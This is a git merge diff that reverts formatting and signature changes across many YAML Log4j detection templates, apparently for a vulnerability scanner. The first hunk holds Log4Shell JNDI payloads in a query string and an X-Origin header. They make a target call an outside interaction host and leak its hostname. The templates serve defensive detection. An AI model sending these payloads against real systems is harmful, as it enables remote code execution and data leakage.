Merge pull request #8424 from projectdiscovery/reverted-log4j-templates
reverted log4j templatespatch-1
commit
39b37221f7
|
@ -35,6 +35,7 @@ http:
|
|||
- |
|
||||
GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
@ -58,7 +59,6 @@ http:
|
|||
X-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
@ -74,7 +74,7 @@ http:
|
|||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
|
@ -86,5 +86,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
|
||||
part: interactsh_request
|
||||
# digest: 4b0a00483046022100cdec4b5d8980cc136a59c99bdf67592c090c7e3f38099f240f8e632a3a1716bd022100b6df914d5c1c27af20c1aeb0f9ac78a20ff66f9e04e188c0bbf641443db1ef02:922c64590222798bb761d5b6d8e72950
|
||||
part: interactsh_request
|
|
@ -66,7 +66,7 @@ http:
|
|||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
|
@ -77,5 +77,4 @@ http:
|
|||
group: 1
|
||||
regex:
|
||||
- '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100c60fb46ec715ed6c4218ace6f3f46cdee865c987b0e3cb1a7d36621319e40819022056b9f2ed8a695079a54387d8d7cf81b255d60d203871db28aad5a34c07024ee1:922c64590222798bb761d5b6d8e72950
|
||||
part: interactsh_request
|
|
@ -42,20 +42,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4b0a00483046022100d00b7aa2d5fc2cf73ebc5413a3019767ef23cc4180b3335c7c9b6258c1d9435b0221008ccd0daf25810e5c58d9bd86ea2afe24c55ea36a88369c6f0258d09dc7fd1b27:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -55,20 +55,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100dff546abd1c1e52272d68cc689729d7dc1d7c01592bb9d190c3e341a4ef1589f022009b0a0a3bae2340288fe8bb13505dc8796bd42f342a68fbe987e27b0c715e100:922c64590222798bb761d5b6d8e72950
|
|
@ -52,20 +52,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4b0a00483046022100d198ac01af3dc8bde3d25f49bd41b5a8268aab1617dfd11cae4bde977db88f30022100b24c3f88bee3eb6548048575e454334964b5718816e7822da6631a0c83e68f34:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -51,20 +51,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a0046304402204424d1b4c2ca756d2efe801b61859c28cc5facffd3f3e4877975d0ac6074e1fe02203eecf6378824ef30aa1c761d41d9768ad11e42700caf148aa90fa8483a9c4769:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -44,20 +44,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a0046304402202603ae664b279e6055139e3d6fa89c744ba9d7bea89035d6a74f8fc5813e688d02207445fffe3cff7440d500f138193a25d8995e5c4da30c7d26f18bfc50c43453ad:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -42,20 +42,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100d514fdc8236eb4a3d7e30f0d03dde613b2369e2ebcce1164795a44f45d73649f02203bb36fa5f1165f96f8993fd90d5fea37284702557e484e7428891ff09b8d542c:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -51,20 +51,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a0047304502205dc4953c115d06cb7f71f87981a60e87c24769618f1795d9ce80a988b210f12e022100fe46ec47b7fc95edad6766539c2444ff012019d14680d45f79210fc693d9c128:922c64590222798bb761d5b6d8e72950
|
|
@ -50,20 +50,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4a0a004730450221008f9e5730500675fa4925e8e899fde41bd5825b8e0cbd90da49b1c77ccaf46de802203f967f91f213d910140e390b564d60705c8210764386109bd553f4d1a452e153:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -47,20 +47,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100c16edd83e05c94591418430a6e0d02229617c11c9bfa14b9160652d1c04a9df002206bc2f82e47ddf948eae00a265b6088f5f70a47511aa28b5f520e0e0e2a786413:922c64590222798bb761d5b6d8e72950
|
|
@ -49,7 +49,7 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
|
@ -62,15 +62,16 @@ http:
|
|||
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a0046304402201afb2e9417d23c2ea5368ccdfa0445cf3517d34b8db7f1b1d1a7defdb6cfa2cb022003c6ba2ee9d8d3d0eae58e5dc118e86f51e2a8ce68176a5012c83c0e3edd0b67:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -52,20 +52,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4b0a00483046022100ccc0573689b16d9bd838b2cfb5413a29132d6ee56a8c64a8681041188b6b3547022100e1fc3a7b8ff5cb752a894725af76ff9de1aebc03db85cfe5804168f4c7d6ef20:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -43,20 +43,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4b0a00483046022100dbbf7b611410f248325e1c76e5b42ef46f2a3ed5e99dac5a7771351a0b9d089b022100b9b7bc718ff9252518c7ad0de841a4f78da98db5dd7c35dd15a77fd4e4b06273:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -44,20 +44,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022057f2fba3cf03ecda6d62398b7a33c35412da550ce0c0ed2e9b7efda5743b0aae022100d133541112f6985ba8a61e752a22887ebe5093fead4bf1d338a8db4a21efbcf5:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -50,20 +50,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a00463044022052eb1e9d2ac6b84a6a306516b90c92df82ffb02d8c3d76c6bab2945c3d9010d102204f46bd311bece2e0552a805f48b833c5a315fb7701489b934a3cf586e2132ac8:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -46,20 +46,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a0046304402201f00b763e60670eec4283cda688678c4e072812d507e7c066d8a72b2c11a84e7022044154ccfa0a8df95360d1e8c2cd27aa00ee74f2285de0e049f96f5ea8297180b:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -44,20 +44,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100b57bf84433fbff96d04708b92b9957bee63cbac77446b0273cbd2888976457ce02203d18d48e50e0476b5f99e8a86515c9ffc4ce8735f352d248b0cb1f3cabf4a416:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -50,20 +50,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022100fab4ecc41af0191778534b4efdb7edf6c61d25404c616aa1cda9a5dd3b577739022057b251f28bce03d9d78a089ff41f154631efc03ce5f1079318dcc433d9f8c10c:922c64590222798bb761d5b6d8e72950
|
|
@ -40,20 +40,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 490a00463044022021f25a1985d55a727c597cbdaaf28bdf2a5b7519e4c6440907998f73d6766ad202207c93c7fc8670170f175a470f6e3845413b8e8ec6fdfe6f84d2f67fb0fbcb7387:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -49,20 +49,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a004730450220022242a54624b114b3874d75963250ea54ad342e3e3991395d5dd6346915d36f022100b336a35af96afd9093735c3d2e75fd2324bd5b53870017395dd8aa690217e500:922c64590222798bb761d5b6d8e72950
|
|
@ -47,4 +47,3 @@ http:
|
|||
regex:
|
||||
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
|
||||
part: interactsh_request
|
||||
# digest: 4a0a00473045022037762439401b8e794c524db32078ec70147f5bd2f5d61e70feb310d8877d5f5e022100b1e9fa52d2f223d67b072aa79b77cd6219eee33cf4de20310f86d5b7334046e6:922c64590222798bb761d5b6d8e72950
|
|
@ -50,20 +50,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
|
||||
- interactsh_ip # Print remote interaction IP in output
|
||||
|
||||
- type: regex
|
||||
group: 2
|
||||
regex:
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
|
||||
part: interactsh_request
|
||||
|
||||
- type: regex
|
||||
group: 1
|
||||
regex:
|
||||
part: interactsh_request
|
||||
# digest: 4b0a00483046022100de5736c6ce7f7d3cde69a2e0b68dbcb3d44d75442ce8024f8e94ed882c22914b022100e671a3a611ebad279c50c74614df1051719b65144eacaca257ae7cec0689b162:922c64590222798bb761d5b6d8e72950
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
part: interactsh_request
|
|
@ -53,20 +53,21 @@ http:
|
|||
- type: regex
|
||||
part: interactsh_request
|
||||
regex:
|
||||
|
||||
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
